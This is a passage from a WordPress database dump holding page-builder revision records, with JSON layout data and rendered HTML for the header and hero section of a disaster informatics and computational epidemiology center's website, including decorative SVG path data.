13:59:22','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>© 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics & Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment & Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/about\\/our-mission\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h29\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h31\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h33\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h37\",\"parentId\":\"22-h36\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h36\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h38\",\"parentId\":\"22-h35\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h35\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-04-29 09:59:22','2022-04-29 13:59:22','',23,'https://gsudice.dataconn.net/?p=1303',0,'revision','',0),(1304,1,'2022-04-29 09:59:22','2022-04-29 13:59:22','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n <!---->\n <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n <!---->\n <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <div data-nav-normal=\"\">\n <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n <!---->\n <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n <!---->\n <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n <div class=\"icon-container h-hamburger-icon\">\n <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n <!--Icon by Font Awesome (https://fontawesome.com)-->\n <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n </svg>\n </div>\n </div>\n </a>\n <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n <!---->\n <div class=\"offscreen-header h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n <!---->\n <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n </a>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"offscreen-content\">\n <!---->\n <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n <!---->\n <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n </div>\n </div>\n <div class=\"offscreen-footer h-ui-empty-state-container\">\n <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-257 style-local-22-h15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-none style-258-outer style-local-22-h16-outer\">\n <div data-colibri-id=\"22-h16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-258 style-local-22-h16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"22-h17\" class=\"h-text h-text-component style-259 style-local-22-h17 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>© 2022</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div id=\"offcanvas-overlay-22-h9\" class=\"offscreen-overlay style-251-offscreenOverlay style-local-22-h9-offscreenOverlay\"></div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-nav-sticky=\"\" style=\"display: none;\"></div>\n </div>\n </div>\n </div>\n <div data-colibri-id=\"22-h24\" id=\"hero\" class=\"h-section h-hero d-flex align-items-lg-center align-items-md-center align-items-center style-212 style-local-22-h24 position-relative\">\n <div class=\"background-wrapper\">\n <div class=\"background-layer background-layer-media-container-lg\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container-md\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n <div class=\"background-layer background-layer-media-container\">\n <!---->\n <div class=\"overlay-layer\">\n <div class=\"overlay-image-layer\" style=\"background-color: rgb(212, 211, 225); opacity: 0.5;\"></div>\n <div class=\"shape-layer colibri-shape-circles-2\" style=\"background-position: center center; background-size: cover; background-repeat: no-repeat; filter: invert(0%);\"></div>\n </div>\n </div>\n </div>\n <div class=\"h-separator\" style=\"height: 165px; top: 0px;\">\n <svg style=\"fill:white;\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.14\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M358.2,118.5c2.7.7,4.2.9,1.4,1.6,6.4.2,4.5-.4,6.4-.6-6.7-.4,5.4-.8,1.4-1.6C361,117.8,366.8,119.1,358.2,118.5Z\"></path>\n <path d=\"M339.8,118.1c-3.6-.4,0-.6-6.3-.8C334.1,117.6,335.1,118,339.8,118.1Z\"></path>\n <path d=\"M360.9,118.5c1-.3,4.5-.5-.8-.9C361.2,117.9,356.6,118.2,360.9,118.5Z\"></path>\n <path d=\"M406.1,117.7c.9.2-1.1.5,1.9.6C410.1,118.2,412.5,117.9,406.1,117.7Z\"></path>\n <path d=\"M374.9,117c2-.1,1.8-.7-3.4-.7C373,116.5,372.5,116.9,374.9,117Z\"></path>\n <path d=\"M402.9,115.6c.6-.2,3.2-.2,2.2-.6C401.5,114.8,400,115.4,402.9,115.6Z\"></path>\n <path d=\"M226.2,110.6c2-.2,1.7.7,4.8.8-1.5-.5,1.7-.5.5-1C228.2,110.4,222.5,110.2,226.2,110.6Z\"></path>\n <path d=\"M404.4,114.2c-.2.1-1.4.1-2.6.2a8.94,8.94,0,0,0,3.2.5C405.3,114.7,406.5,114.4,404.4,114.2Z\"></path>\n <path d=\"M332.9,111.9a66.47,66.47,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C339.1,111.5,336.8,112,332.9,111.9Z\"></path>\n <path d=\"M393.1,112.4c-.9.3,2.5.4,4.7.5C399.4,112.6,398.4,112.3,393.1,112.4Z\"></path>\n <path d=\"M340.6,111.1c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C339.4,111.3,344.9,111.3,340.6,111.1Z\"></path>\n <path d=\"M313.3,110.2c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C309.5,110.3,312.9,110.4,313.3,110.2Z\"></path>\n <path d=\"M317.1,108.2c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C309.8,107.9,313.6,108.4,317.1,108.2Z\"></path>\n <path d=\"M326.8,108.1c-2.6.1-6.4,0-6.7.3C324.7,108.5,326.8,108.4,326.8,108.1Z\"></path>\n <path d=\"M540.9,113c4,.1,3.8-.2,3.7-.5C540.1,112.4,540.3,112.7,540.9,113Z\"></path>\n <path d=\"M320.1,106.8a37.78,37.78,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C320.3,107.4,318.6,107.3,320.1,106.8Z\"></path>\n <path d=\"M361,107.5c-.4.3-7.1.6.8.9C359.5,108,365.2,107.8,361,107.5Z\"></path>\n <path d=\"M368.1,104.5c1.4,0,2.8.1,4.2.1-1-.4,3-.4-1.9-.6C371.8,104.4,366.8,104.2,368.1,104.5Z\"></path>\n <path d=\"M354.9,102.2c-2.7-.1-3,.1-5.6,0,5.3.5-1.8,1.5,4.3,1.7.2-1.1,1.6-1.1,3.6-2.2C350.1,101.5,349.6,101.6,354.9,102.2Z\"></path>\n <path d=\"M359,100.5c-5.3,0-4.4.6-6.1,1C359.4,101.6,357.9,100.9,359,100.5Z\"></path>\n <path d=\"M87.7,93.8c-5.6-.2-1.5,1.4-.4,1.1C87.3,94.2,86.8,94.2,87.7,93.8Z\"></path>\n <path d=\"M388.4,99.2a26.77,26.77,0,0,1-4.2,0c5.2.5,1.9.9,6.7,1.2C389.7,100.1,391.9,99.5,388.4,99.2Z\"></path>\n <path d=\"M308,97.8c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C310.9,97.7,311.5,98,308,97.8Z\"></path>\n <path d=\"M475.7,100.5c0,.2-3.8.8,2.2.9C476.8,101.2,478.9,100.7,475.7,100.5Z\"></path>\n <path d=\"M369.5,98.2c4.2.1,3.2.6,6.3.8-1.3-.4,5.9-.5.5-1C378.9,98.6,369,97.9,369.5,98.2Z\"></path>\n <path d=\"M112,92.9c0-.4,1.8-.7,1.8-1.2C110,91.7,108,92.8,112,92.9Z\"></path>\n <path d=\"M465,99.5c-5.2-.4-2.3-.7-6.3-.9.2.6,3.4,1,5.4,1.4C462.7,99.7,465.9,99.8,465,99.5Z\"></path>\n <path d=\"M382.4,97.1c-.5.3-2.3.7,1,1.1C383.6,98.1,386.1,97.5,382.4,97.1Z\"></path>\n <path d=\"M375,96.6c-2.5,0-4.4-.1-5.8-.2-.8.4,3.2.6,3.6,1-2-.1-2.5-.2-4.4-.3l.2.2c-.9,0-1.7,0-1.3.1,4.5,0,2.3.4,6,.5,3.6-.4.4-.6-1-1.1A24.16,24.16,0,0,0,375,96.6Z\"></path>\n <path d=\"M360.5,97.5c.2-.4,2.6-1-1.3-1.4C359.1,96.6,355.4,97,360.5,97.5Z\"></path>\n <path d=\"M137.1,91.4c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C145.1,91.6,139.2,91.1,137.1,91.4Z\"></path>\n <path d=\"M119,89.8c2.2.2,4.2.6,2,.7a26.11,26.11,0,0,1,2.8.1c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5C122.6,90,119.9,89.5,119,89.8Z\"></path>\n <path d=\"M305.8,93.8c-.6.5,7.3.4,10,.3C312.4,93.7,308.9,94.1,305.8,93.8Z\"></path>\n <path d=\"M383.2,94.8c4.5-.5,2,.4,6,.5.2-.5-1.5-.8-7.8-.9C381.8,94.5,381.2,94.8,383.2,94.8Z\"></path>\n <path d=\"M312.9,90.7c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C309.3,91.2,313.2,91.2,312.9,90.7Z\"></path>\n <path d=\"M477.8,95.1c-3.8.1-7,.2-9.4.4,4.5.2,2.9-.3,8.3,0C476.5,95.3,476.8,95.2,477.8,95.1Z\"></path>\n <path d=\"M320.4,91.3c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C320.8,91.7,324.3,91.5,320.4,91.3Z\"></path>\n <path d=\"M122.5,85.9c.2.3-4.3.8.9,1C122.6,86.6,126.8,86.2,122.5,85.9Z\"></path>\n <path d=\"M311.1,90.3c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C303.4,89.8,308.8,89.9,311.1,90.3Z\"></path>\n <path d=\"M163.4,85.1c4.8.2,7.4-.4,2.2-.6C163.8,84.6,165.2,85,163.4,85.1Z\"></path>\n <path d=\"M422,90c-1.3.2-6.2.5-.7.7a10.17,10.17,0,0,1,2.7,0C418.8,90.3,425.8,90.5,422,90Z\"></path>\n <path d=\"M315,86.9c-5.7-.1-11.4.9-5.9,1.2-1.1-.3.2-.4,4-.2C307.8,87.2,319.7,87.3,315,86.9Z\"></path>\n <path d=\"M321.2,86c3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.4.2-2.5.7,2.2.9,1.4-.6,2,.4,7.2.3C326.4,86.9,326.5,85.9,321.2,86Z\"></path>\n <path d=\"M352.5,86.8c-1.5-.7-5.1,0-8.8-.5,1.6.5-.5.8,3.6,1C346,86.8,349.2,86.5,352.5,86.8Z\"></path>\n <path d=\"M500.2,90.5c.7-.2,4.7-.6-.7-.8,1.5.4-.9.4-2.3.5A25,25,0,0,1,500.2,90.5Z\"></path>\n <path d=\"M359,86.3c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C362.5,85.8,360.3,86,359,86.3Z\"></path>\n <path d=\"M474.6,88.3c.3.2.2.4,3.1.4-.2-.2-.3-.4-.5-.6-4.5,0-3.2-.4-6-.5-.4.2-3.9.1-2.3.5A37.42,37.42,0,0,0,474.6,88.3Z\"></path>\n <path 